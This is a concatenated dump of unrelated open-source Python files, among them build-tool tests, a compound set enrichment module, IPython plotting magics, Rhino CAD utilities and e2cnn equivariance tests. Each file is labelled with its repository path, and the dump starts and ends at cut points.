def test_fingerprint_file_outside_buildroot(tmp_path: Path, rule_runner: RuleRunner) -> None:
outside_buildroot = rule_runner.write_files({(tmp_path / "foobar").as_posix(): "foobar"})[0]
with pytest.raises(ValueError):
OptionsFingerprinter().fingerprint(file_option, outside_buildroot)
def test_fingerprint_file_list(rule_runner: RuleRunner) -> None:
f1, f2, f3 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
("spam/egg.config", "blah blah blah"),
)
)
fp1 = OptionsFingerprinter().fingerprint(file_option, [f1, f2])
fp2 = OptionsFingerprinter().fingerprint(file_option, [f2, f1])
fp3 = OptionsFingerprinter().fingerprint(file_option, [f1, f3])
assert fp1 == fp2
assert fp1 != fp3
def test_fingerprint_primitive() -> None:
fp1, fp2 = (OptionsFingerprinter().fingerprint("", v) for v in ("foo", 5))
assert fp1 != fp2
def test_fingerprint_unset_bool() -> None:
fp1 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
fp2 = OptionsFingerprinter().fingerprint(UnsetBool, UnsetBool)
assert fp1 == fp2
def test_fingerprint_dir(rule_runner: RuleRunner) -> None:
d1 = rule_runner.create_dir("a")
d2 = rule_runner.create_dir("b")
d3 = rule_runner.create_dir("c")
rule_runner.write_files(
{
"a/bar/bar.config": "blah blah blah",
"a/foo/foo.config": "meow meow meow",
"b/foo/foo.config": "meow meow meow",
"b/bar/bar.config": "blah blah blah",
"c/bar/bar.config": "blah meow blah",
}
)
dp1 = OptionsFingerprinter().fingerprint(dir_option, [d1])
dp2 = OptionsFingerprinter().fingerprint(dir_option, [d1, d2])
dp3 = OptionsFingerprinter().fingerprint(dir_option, [d2, d1])
dp4 = OptionsFingerprinter().fingerprint(dir_option, [d3])
assert dp1 == dp1
assert dp2 == dp2
assert dp1 != dp3
assert dp1 != dp4
assert dp2 != dp3
def test_fingerprint_dict_with_files_order(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f2},{f1}"})
assert fp1 == fp2
def test_fingerprint_dict_with_file_content_change(rule_runner: RuleRunner) -> None:
f1, f2 = (
rule_runner.write_files({f: c})[0]
for (f, c) in (
("foo/bar.config", "blah blah blah"),
("foo/bar.config", "meow meow meow"),
)
)
fp1 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
with open(f1, "w") as f:
f.write("123")
fp2 = OptionsFingerprinter().fingerprint(dict_with_files_option, {"properties": f"{f1},{f2}"})
assert fp1 != fp2
|
scaffoldgraph/analysis/enrichment.py | trumanw/ScaffoldGraph | 121 | 21161 | <filename>scaffoldgraph/analysis/enrichment.py
"""
scaffoldgraph.analysis.enrichment
Module contains an implementation of Compound Set Enrichment from the papers:
- Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
- Mining for bioactive scaffolds with scaffold networks: Improved compound set enrichment from primary screening data.
"""
from networkx import set_node_attributes
from scipy.stats import ks_2samp, binom_test
from loguru import logger
def _btp(scaffoldgraph, activity_key, alternative, pd):
"""CSE - binomial test (used in cse functions)."""
result, active, total = {}, 0, 0
for m, a in scaffoldgraph.get_molecule_nodes(activity_key):
if int(a) == 1:
active += 1
total += 1
if pd is None:
pd = active / total
logger.debug(f'(BTP) Total: {total}, Active: {active}, pd: {pd}')
for scaffold in scaffoldgraph.get_scaffold_nodes():
mols, acts = zip(*scaffoldgraph.get_molecules_for_scaffold(scaffold, activity_key))
N, K = len(mols), acts.count(1)
pval = binom_test(K, N, pd, alternative=alternative)
logger.debug(f'(BTP) {scaffold}, {K}, {N}, {pval}')
result[scaffold] = {'pval': pval, '_active': K, '_total': N}
return result
def _ksp(scaffoldgraph, activity_key, alternative):
"""CSE - Kolmogorov-Smirnov test (used in cse functions)."""
result, background = {}, []
for _, activity in scaffoldgraph.get_molecule_nodes(activity_key):
background.append(activity)
for scaffold in scaffoldgraph.get_scaffold_nodes():
mols, acts = zip(*scaffoldgraph.get_molecules_for_scaffold(scaffold, activity_key))
N = len(mols)
dmax, pval = ks_2samp(acts, background, alternative, 'auto')
logger.debug(f'(KSP) {scaffold}, {N}, {dmax}, {pval}')
result[scaffold] = {'pval': pval, 'dmax': dmax, '_total': N}
return result
def bonferroni_correction(scaffoldgraph, crit):
"""Returns bonferroni corrected significance level for each hierarchy.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
crit : float
The critical significance value to apply bonferroni correction at
each scaffold hierarchy.
Returns
-------
dict
A dictionary containing the corrected critical significance value
at each scaffold hierarchy {hierarchy: crit}.
"""
hier = scaffoldgraph.get_hierarchy_sizes()
return {k: crit / v for k, v in hier.items()}
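# Worked example (hypothetical numbers, added for clarity): with crit=0.01 and
# hierarchy sizes {1: 20, 2: 160}, this returns {1: 0.0005, 2: 6.25e-05}, i.e. the
# significance level is divided by the number of scaffolds tested in each hierarchy.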
def calc_scaffold_enrichment(scaffoldgraph, activity, mode='ks', alternative='greater', p=None):
"""
    Calculate scaffold enrichment using the Kolmogorov-Smirnov or binomial test.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
activity : str
A scaffold node attribute key corresponding to an activity value.
If the test is binomial this value should be a binary attribute
(0 or 1 / True or False).
mode : {'ks', 'b'}, optional
A string specifying the statistical test to perform. 'ks' specifies a
Kolmogorov-Smirnov test and 'b' or 'binomial' specifies a binomial test.
The default is 'ks'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available:
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
The default is 'greater'.
p : float, None, optional
The hypothesized probability of success. 0 <= p <= 1. Used in binomial mode.
If not specified p is set automatically (number of active / total compounds).
The default is None.
Returns
-------
dict
A dict of dicts in the format {scaffold: {results}} where results is the set
of results returned by the statistical test and scaffold is a scaffold node
key corresponding to a scaffold in the ScaffoldGraph object.
See Also
--------
scaffoldgraph.analysis.enrichment.compound_set_enrichment
References
----------
.. [1] <NAME>., <NAME>., <NAME>., and <NAME>. (2011). Mining for bioactive scaffolds
with scaffold networks: Improved compound set enrichment from primary screening data.
Journal of Chemical Information and Modeling, 51(7), 1528–1538.
.. [2] <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (2010)
Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
Journal of Chemical Information and Modeling, 50(12), 2067-2078.
"""
if mode == 'binomial' or mode == 'b':
return _btp(scaffoldgraph, activity, alternative, p)
elif mode == 'ks' or mode == 'k':
return _ksp(scaffoldgraph, activity, alternative)
else:
raise ValueError(f'scaffold enrichment mode: {mode}, not implemented')
def compound_set_enrichment(scaffoldgraph, activity, mode='ks', alternative='greater', crit=0.01, p=None):
"""
Perform compound set enrichment (CSE), calculating scaffolds enriched for bioactivity.
Parameters
----------
scaffoldgraph : ScaffoldGraph
A ScaffoldGraph object to query.
activity : str
A scaffold node attribute key corresponding to an activity value.
If the test is binomial this value should be a binary attribute
(0 or 1 / True or False).
mode : {'ks', 'b'}, optional
A string specifying the statistical test to perform. 'ks' specifies a
Kolmogorov-Smirnov test and 'b' or 'binomial' specifies a binomial test.
The default is 'ks'.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available:
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
The default is 'greater'.
crit : float, optional
The critical significance level. The default is 0.01
p : float, None, optional
The hypothesized probability of success. 0 <= p <= 1. Used in binomial mode.
If not specified p is set automatically (number of active / total compounds).
The default is None.
Returns
-------
    tuple
        A tuple of 'enriched' scaffold classes in the format (scaffold, {data}), where data
        is the corresponding node attributes for the returned scaffold.
Notes
-----
P-values are added as node attributes with the key 'pval'.
References
----------
.. [1] <NAME>., <NAME>., <NAME>., and <NAME>. (2011). Mining for bioactive scaffolds
with scaffold networks: Improved compound set enrichment from primary screening data.
Journal of Chemical Information and Modeling, 51(7), 1528–1538.
.. [2] <NAME>., <NAME>., <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>. (2010)
Compound Set Enrichment: A Novel Approach to Analysis of Primary HTS Data.
Journal of Chemical Information and Modeling, 50(12), 2067-2078.
"""
set_node_attributes(scaffoldgraph, calc_scaffold_enrichment(scaffoldgraph, activity, mode, alternative, p))
bonferroni = bonferroni_correction(scaffoldgraph, crit)
result = []
for scaffold, data in scaffoldgraph.get_scaffold_nodes(True):
if data['pval'] < bonferroni[data['hierarchy']]:
result.append((scaffold, data))
return tuple(sorted(result, key=lambda x: x[1]['pval']))
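# --- Hedged usage sketch (illustrative; not part of the original module) ---
# Assumptions: a scaffold network built elsewhere with scaffoldgraph, whose molecule
# nodes carry a binary 'active' attribute; the file name below is hypothetical.
#
#     import scaffoldgraph as sg
#     network = sg.ScaffoldNetwork.from_sdf('primary_screen.sdf')
#     # ...annotate molecule nodes with the binary 'active' attribute...
#     hits = compound_set_enrichment(network, 'active', mode='b', crit=0.01)
#     for scaffold, data in hits[:5]:
#         print(scaffold, data['pval'], data['hierarchy'])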
|
python/brunel/magics.py | Ross1503/Brunel | 306 | 21163 | # Copyright (c) 2015 IBM Corporation and others.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from IPython.core.magic import Magics, magics_class, line_magic, cell_magic, line_cell_magic
import pandas as pd
import brunel.brunel_main as brunel
from IPython import get_ipython
ipy = get_ipython()
@magics_class
class BrunelMagics(Magics):
@line_cell_magic
def brunel(self, line, cell=None):
"Magic that works both as %brunel and as %%brunel"
datas = self.find_dataframes()
# print("Found dataframes", list(datas.keys()))
if cell is not None:
line = line + ' ' + cell.replace('\n',' ')
# print ("Command =", line)
data = None
height = 400
width = 500
output = 'd3'
online_js = False
parts = line.split('::')
action = parts[0].strip()
datasets_in_brunel = brunel.get_dataset_names(action)
self.cache_data(datasets_in_brunel,datas)
if len(parts) > 2:
raise ValueError("Only one ':' allowed in brunel magic. Format is 'ACTION : key=value, ...'")
if len(parts) > 1:
extras = parts[1].strip()
dataName = self.find_term('data', extras)
if dataName is not None:
try:
data = datas[dataName]
except:
raise ValueError("Could not find pandas DataFrame named '" + dataName + "'")
width = self.find_term('width', extras, width)
height = self.find_term('height', extras, height)
online_js = self.find_term('online_js', extras, online_js)
if data is None and len(datasets_in_brunel) == 0:
data = self.best_match(self.get_vars(action), list(datas.values()))
return brunel.display(action, data, width, height, online_js)
def cache_data(self, datasets_in_brunel, dataframes):
for data_name in datasets_in_brunel:
try:
data = dataframes[data_name]
brunel.cacheData(data_name, brunel.to_csv(data))
except:
pass
def find_term(self, key, string, default=None):
for expr in string.split(','):
terms = expr.split('=')
if len(terms) != 2:
raise ValueError("Bad format for key=value pair: " + expr)
if key == terms[0].strip().lower():
return terms[1].strip()
return default
def find_dataframes(self):
result = {}
for name in list(self.shell.user_ns.keys()):
v = self.shell.user_ns[name]
if name[0] != '_' and isinstance(v, pd.DataFrame):
result[name] = v
return result
def get_vars(self, line):
"Search for the internal bits of 'x(a,b)' and return as ['a','b']"
result = []
for part in line.split('('):
p = part.find(')')
if p > 0:
inner = part[:p].split(',')
for term in inner:
result.append(term.strip())
return result
def best_match(self, variables, datas):
# print("Searching for", variables, "in", len(datas), "dataframes")
all = [[self.match(variables, v.columns.values), v] for v in datas]
all.sort(key=lambda x: x[0])
return all[0][1]
def match(self, names1, names2):
n = 0
for i in names1:
for j in names2:
if str(i).lower() == str(j).lower(): n += 1
return -n
# Register with IPython
ipy.register_magics(BrunelMagics)
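# Hedged usage sketch (illustrative): once this module is loaded in an IPython
# notebook, the magic below renders a pandas DataFrame named `df` from the user
# namespace. Everything before '::' is the Brunel action; the key=value pairs after
# it are parsed by find_term() (recognised keys: data, width, height, online_js).
#
#     %brunel x(column_a) y(column_b) color(column_c) :: data=df, width=800, height=400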
|
lte/gateway/python/magma/enodebd/tr069/tests/models_tests.py | Aitend/magma | 849 | 21185 | <reponame>Aitend/magma
"""
Copyright 2020 The Magma Authors.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree.
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
from magma.enodebd.tr069.models import DeviceIdStruct
from spyne import ComplexModelBase
class DeviceIdStructTests(unittest.TestCase):
def test_as_dict_memory_leak(self):
"""
Test to ensure as_dict() doesn't leak model instances
"""
thing = DeviceIdStruct(
Manufacturer='abc',
OUI='def',
ProductClass='ghi',
SerialNumber='jkl',
)
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'def',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
# inspect the spyne.util.memoize object that wraps the staticmethod
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
# should produce a different result and not grow the size of memo
thing.OUI = 'aaaa'
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'aaaa',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
# use a different object this time. Again should not grow memo
thing = DeviceIdStruct(
Manufacturer='abc',
OUI='def',
ProductClass='ghi',
SerialNumber='jkl',
)
res = thing.as_dict()
self.assertEqual(
{
'Manufacturer': 'abc',
'OUI': 'def',
'ProductClass': 'ghi',
'SerialNumber': 'jkl',
},
res,
)
self.assertEqual(1, len(ComplexModelBase.get_flat_type_info.memo))
|
main.py | Lasx/gb688_downloader | 119 | 21191 | <reponame>Lasx/gb688_downloader<filename>main.py<gh_stars>100-1000
from standard import HDB, NatureStd
if __name__ == "__main__":
hb = HDB('hbba')
db = HDB('dbba')
data = db.search('政务云工程评价指标体系及方法')
print(data)
# first_record = data["records"][0]
# name = f'{first_record["code"]}({first_record["chName"]}'
# db.download(pk=first_record['pk'], name=name)
# std = NatureStd()
# std.search("")
# std.download("http://www.nrsis.org.cn/portal/stdDetail/211166", "乡(镇)土地利用总体规划制图规范.pdf") # 行标
|
notebook/dict_keys_values_items.py | vhn0912/python-snippets | 174 | 21196 | <filename>notebook/dict_keys_values_items.py
d = {'key1': 1, 'key2': 2, 'key3': 3}
for k in d:
print(k)
# key1
# key2
# key3
for k in d.keys():
print(k)
# key1
# key2
# key3
keys = d.keys()
print(keys)
print(type(keys))
# dict_keys(['key1', 'key2', 'key3'])
# <class 'dict_keys'>
k_list = list(d.keys())
print(k_list)
print(type(k_list))
# ['key1', 'key2', 'key3']
# <class 'list'>
for v in d.values():
print(v)
# 1
# 2
# 3
values = d.values()
print(values)
print(type(values))
# dict_values([1, 2, 3])
# <class 'dict_values'>
v_list = list(d.values())
print(v_list)
print(type(v_list))
# [1, 2, 3]
# <class 'list'>
for k, v in d.items():
print(k, v)
# key1 1
# key2 2
# key3 3
for t in d.items():
print(t)
print(type(t))
print(t[0])
print(t[1])
print('---')
# ('key1', 1)
# <class 'tuple'>
# key1
# 1
# ---
# ('key2', 2)
# <class 'tuple'>
# key2
# 2
# ---
# ('key3', 3)
# <class 'tuple'>
# key3
# 3
# ---
items = d.items()
print(items)
print(type(items))
# dict_items([('key1', 1), ('key2', 2), ('key3', 3)])
# <class 'dict_items'>
i_list = list(d.items())
print(i_list)
print(type(i_list))
# [('key1', 1), ('key2', 2), ('key3', 3)]
# <class 'list'>
print(i_list[0])
print(type(i_list[0]))
# ('key1', 1)
# <class 'tuple'>
|
flows/tests/settings.py | sergioisidoro/django-flows | 104 | 21197 | <reponame>sergioisidoro/django-flows
import django
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
}
}
INSTALLED_APPS = ['flows', 'flows.statestore.tests', 'django_nose']
SECRET_KEY = 'flow_tests'
if django.VERSION < (1, 6):
TEST_RUNNER = 'django.test.simple.DjangoTestSuiteRunner'
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
MIDDLEWARE_CLASSES = []
ROOT_URLCONF = ''
if django.VERSION < (1, 7):
try:
__import__('south')
except ImportError:
pass
else:
INSTALLED_APPS.append('south')
|
python/craftassist/ttad/generation_dialogues/build_scene_flat_script.py | satyamedh/craftassist | 626 | 21217 | <reponame>satyamedh/craftassist
if __name__ == "__main__":
import argparse
import pickle
import os
from tqdm import tqdm
from build_scene import *
from block_data import COLOR_BID_MAP
BLOCK_DATA = pickle.load(
open("/private/home/aszlam/minecraft_specs/block_images/block_data", "rb")
)
allowed_blocktypes = []
count = 0
for c, l in COLOR_BID_MAP.items():
for idm in l:
allowed_blocktypes.append(BLOCK_DATA["bid_to_name"][idm])
count += 1
parser = argparse.ArgumentParser()
parser.add_argument("--target", default="/checkpoint/aszlam/minecraft/inverse_model/flat_ads/")
parser.add_argument("--N", type=int, default=10000000)
# parser.add_argument("--num_per_chunk", type=int, default=10000000)
args = parser.parse_args()
template_attributes = {"count": range(1, 5)}
template_attributes["step"] = range(1, 10)
template_attributes["non_shape_names"] = ["triangle", "circle", "disk", "rectangle"]
template_attributes["mob_names"] = ["pig", "sheep", "cow", "chicken"]
template_attributes["allowed_blocktypes"] = allowed_blocktypes
template_attributes["distribution"] = {
"MOVE": 1.0,
"BUILD": 1.0,
"DESTROY": 1.0,
"DIG": 0.8,
"COPY": 0.8,
"FILL": 0.8,
"SPAWN": 0.1,
"DANCE": 0.8,
}
scenes = []
for i in tqdm(range(args.N)):
S = build_scene(template_attributes, sl=16, flat=True)
scenes.append(S)
f = open(os.path.join(args.target, "flat_scenes_dump.pk"), "wb")
pickle.dump(scenes, f)
f.close()
|
modules/transfer/scripts/info.py | sishuiliunian/falcon-plus | 7,208 | 21218 | <gh_stars>1000+
import requests
# Copyright 2017 Xiaomi, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
d = [
{
"endpoint": "hh-op-mon-tran01.bj",
"counter": "load.15min",
},
{
"endpoint": "hh-op-mon-tran01.bj",
"counter": "net.if.in.bytes/iface=eth0",
},
{
"endpoint": "10.202.31.14:7934",
"counter": "p2-com.xiaomi.miui.mibi.service.MibiService-method-createTradeV1",
},
]
url = "http://query.falcon.miliao.srv:9966/graph/info"
r = requests.post(url, data=json.dumps(d))
print(r.text)
#curl "localhost:9966/graph/info/one?endpoint=`hostname`&counter=load.1min" |python -m json.tool
|
stix_shifter_modules/secretserver/stix_transmission/delete_connector.py | grimmjow8/stix-shifter | 129 | 21232 | from stix_shifter_utils.modules.base.stix_transmission.base_delete_connector import BaseDeleteConnector
class DeleteConnector(BaseDeleteConnector):
def __init__(self, api_client):
self.api_client = api_client
def delete_query_connection(self, search_id):
return {"success": True}
|
tests/test_crud/conftest.py | amisadmin/fastapi_amis_admin | 166 | 21241 | <filename>tests/test_crud/conftest.py<gh_stars>100-1000
import pytest
from tests.test_crud.main import app
@pytest.fixture(scope='session', autouse=True)
def startup():
import asyncio
# asyncio.run(app.router.startup())
loop = asyncio.get_event_loop()
loop.run_until_complete(app.router.startup())
|
src/settings.py | MichaelJWelsh/bot-evolution | 151 | 21294 | <reponame>MichaelJWelsh/bot-evolution
"""
This module contains the general settings used across modules.
"""
FPS = 60
WINDOW_WIDTH = 1100
WINDOW_HEIGHT = 600
TIME_MULTIPLIER = 1.0
|
src/compas_rhino/utilities/misc.py | XingxinHE/compas | 235 | 21305 | <gh_stars>100-1000
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
try:
basestring
except NameError:
basestring = str
import os
import sys
import ast
from compas_rhino.forms import TextForm
from compas_rhino.forms import ImageForm
import System
import rhinoscriptsyntax as rs
import Rhino
import clr
clr.AddReference('Rhino.UI')
import Rhino.UI # noqa: E402
from Rhino.UI.Dialogs import ShowMessageBox # noqa: E402
try:
from compas_rhino.forms import PropertyListForm
except ImportError:
from Rhino.UI.Dialogs import ShowPropertyListBox
__all__ = [
'wait',
'get_tolerance',
'toggle_toolbargroup',
'pick_point',
'browse_for_folder',
'browse_for_file',
'print_display_on',
'display_message',
'display_text',
'display_image',
'display_html',
'update_settings',
'update_named_values',
'screenshot_current_view',
'select_folder',
'select_file',
'unload_modules',
]
# ==============================================================================
# Truly miscellaneous :)
# ==============================================================================
def screenshot_current_view(path,
width=1920,
height=1080,
scale=1,
draw_grid=False,
draw_world_axes=False,
draw_cplane_axes=False,
background=False):
"""Take a screenshot of the current view.
Parameters
----------
path : str
The filepath for saving the screenshot.
Other Parameters
----------------
width : int, optional
height : int, optional
scale : float, optional
draw_grid : bool, optional
draw_world_axes : bool, optional
draw_cplane_axes : bool, optional
background : bool, optional
Returns
-------
bool
True if the command was successful.
False otherwise.
"""
properties = [draw_grid, draw_world_axes, draw_cplane_axes, background]
properties = ["Yes" if item else "No" for item in properties]
scale = max(1, scale) # the rhino command requires a scale > 1
rs.EnableRedraw(True)
rs.Sleep(0)
result = rs.Command("-_ViewCaptureToFile \"" + os.path.abspath(path) + "\""
" Width=" + str(width) +
" Height=" + str(height) +
" Scale=" + str(scale) +
" DrawGrid=" + properties[0] +
" DrawWorldAxes=" + properties[1] +
" DrawCPlaneAxes=" + properties[2] +
" TransparentBackground=" + properties[3] +
" _enter", False)
rs.EnableRedraw(False)
return result
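# Illustrative call (hypothetical output path): capture the active viewport at double
# resolution with the construction grid visible.
#
#     screenshot_current_view('C:/Temp/view.png', scale=2, draw_grid=True)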
def wait():
return Rhino.RhinoApp.Wait()
def get_tolerance():
"""Get the absolute tolerance.
Returns
-------
float
The tolerance.
"""
return rs.UnitAbsoluteTolerance()
def toggle_toolbargroup(rui, group):
if not os.path.exists(rui) or not os.path.isfile(rui):
return
collection = rs.IsToolbarCollection(rui)
if not collection:
collection = rs.OpenToolbarCollection(rui)
if rs.IsToolbar(collection, group, True):
rs.ShowToolbar(collection, group)
else:
if rs.IsToolbar(collection, group, True):
if rs.IsToolbarVisible(collection, group):
rs.HideToolbar(collection, group)
else:
rs.ShowToolbar(collection, group)
def pick_point(message='Pick a point.'):
point = rs.GetPoint(message)
if point:
return list(point)
return None
# ==============================================================================
# File system
# ==============================================================================
def browse_for_folder(message=None, default=None):
return rs.BrowseForFolder(folder=default, message=message, title='compas')
select_folder = browse_for_folder
def browse_for_file(title=None, folder=None, filter=None):
if filter == 'json':
filter = 'JSON files (*.json)|*.json||'
elif filter == 'obj':
filter = 'OBJ files (*.obj)|*.obj||'
elif filter == 'fofin':
filter = 'FOFIN session files (*.fofin)|*.fofin||'
else:
pass
return rs.OpenFileName(title, filter=filter, folder=folder)
select_file = browse_for_file
# ==============================================================================
# Display
# ==============================================================================
def print_display_on(on=True):
if on:
rs.Command('_PrintDisplay State On Color Display Thickness 1 _Enter')
else:
rs.Command('_PrintDisplay State Off _Enter')
def display_message(message):
return ShowMessageBox(message, 'Message')
def display_text(text, title='Text', width=800, height=600):
if isinstance(text, (list, tuple)):
text = '{0}'.format(System.Environment.NewLine).join(text)
form = TextForm(text, title, width, height)
return form.show()
def display_image(image, title='Image', width=800, height=600):
form = ImageForm(image, title, width, height)
return form.show()
def display_html():
raise NotImplementedError
# ==============================================================================
# Settings and attributes
# ==============================================================================
def update_named_values(names, values, message='', title='Update named values', evaluate=False):
try:
dialog = PropertyListForm(names, values)
except Exception:
values = ShowPropertyListBox(message, title, names, values)
else:
if dialog.ShowModal(Rhino.UI.RhinoEtoApp.MainWindow):
values = dialog.values
else:
values = None
if evaluate:
if values:
values = list(values)
for i in range(len(values)):
value = values[i]
try:
value = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
pass
values[i] = value
return values
def update_settings(settings, message='', title='Update settings'):
names = sorted(settings.keys())
values = [str(settings[name]) for name in names]
values = update_named_values(names, values, message=message, title=title)
if values:
values = list(values)
for name, value in zip(names, values):
try:
settings[name] = ast.literal_eval(value)
except (TypeError, ValueError, SyntaxError):
settings[name] = value
return True
return False
def unload_modules(top_level_module_name):
"""Unloads all modules named starting with the specified string.
This function eases the development workflow when editing a library that is
used from Rhino/Grasshopper.
Parameters
----------
top_level_module_name : :obj:`str`
Name of the top-level module to unload.
Returns
-------
list
List of unloaded module names.
"""
    # Materialize the matches up front so sys.modules can be mutated safely below.
    modules = list(filter(lambda m: m.startswith(top_level_module_name), sys.modules))
for module in modules:
sys.modules.pop(module)
return modules
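# Illustrative call: after editing a library on disk, drop its cached modules so the
# next import inside Rhino/Grasshopper picks up the fresh code.
#
#     unload_modules('compas')
#     import compas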
|
test/nn/test_nonlinearities_fliprotations.py | steven-lang/e2cnn | 356 | 21342 | <gh_stars>100-1000
import unittest
from unittest import TestCase
from e2cnn.nn import *
from e2cnn.gspaces import *
import random
class TestNonLinearitiesFlipRotations(TestCase):
def test_dihedral_norm_relu(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_dihedral_norm_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
r = FieldType(g, list(g.representations.values()) * 4)
nnl = NormNonLinearity(r, function='n_sigmoid')
nnl.check_equivariance()
def test_dihedral_pointwise_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_relu')
nnl.check_equivariance()
def test_dihedral_pointwise_sigmoid(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'pointwise' in r.supported_nonlinearities]
r = FieldType(g, reprs)
nnl = PointwiseNonLinearity(r, function='p_sigmoid')
nnl.check_equivariance()
def test_dihedral_gated_one_input_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
r = FieldType(g, reprs).sorted()
ngates = len(r)
reprs = [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
r = r + FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_one_input_all_shuffled(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(reprs)
reprs += [g.trivial_repr] * ngates
gates = ['gated'] * ngates + ['gate'] * ngates
t = list(zip(reprs, gates))
random.shuffle(t)
reprs, gates = zip(*t)
r = FieldType(g, reprs)
nnl = GatedNonLinearity1(r, gates=gates)
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_shuffled_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 3
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated)
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_gated_two_inputs_sorted_gated(self):
N = 8
g = FlipRot2dOnR2(N)
gated = [r for r in g.representations.values() if 'gated' in r.supported_nonlinearities] * 2
ngates = len(gated)
gates = [g.trivial_repr] * ngates
gates = FieldType(g, gates)
gated = FieldType(g, gated).sorted()
nnl = GatedNonLinearity2((gates, gated))
nnl.check_equivariance()
def test_dihedral_concat_relu(self):
N = 8
g = FlipRot2dOnR2(N)
reprs = [r for r in g.representations.values() if 'concatenated' in r.supported_nonlinearities]
for rep in reprs:
r = FieldType(g, [rep])
nnl = ConcatenatedNonLinearity(r, function='c_relu')
nnl.check_equivariance()
def test_dihedral_induced_norm_relu(self):
N = 9
g = FlipRot2dOnR2(N)
sg_id = (None, N)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, int(N // 2))] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_norm_relu(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
r = FieldType(g, [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 7)] * 4).sorted()
nnl = InducedNormNonLinearity(r, function='n_relu')
nnl.check_equivariance()
def test_o2_induced_gated(self):
g = FlipRot2dOnR2(-1, 10)
sg_id = (None, -1)
so2, _, _ = g.fibergroup.subgroup(sg_id)
reprs = [g.induced_repr(sg_id, so2.irrep(k)) for k in range(1, 3)] * 5
ngates = len(reprs)
reprs += [g.induced_repr(sg_id, so2.trivial_representation)] * ngates
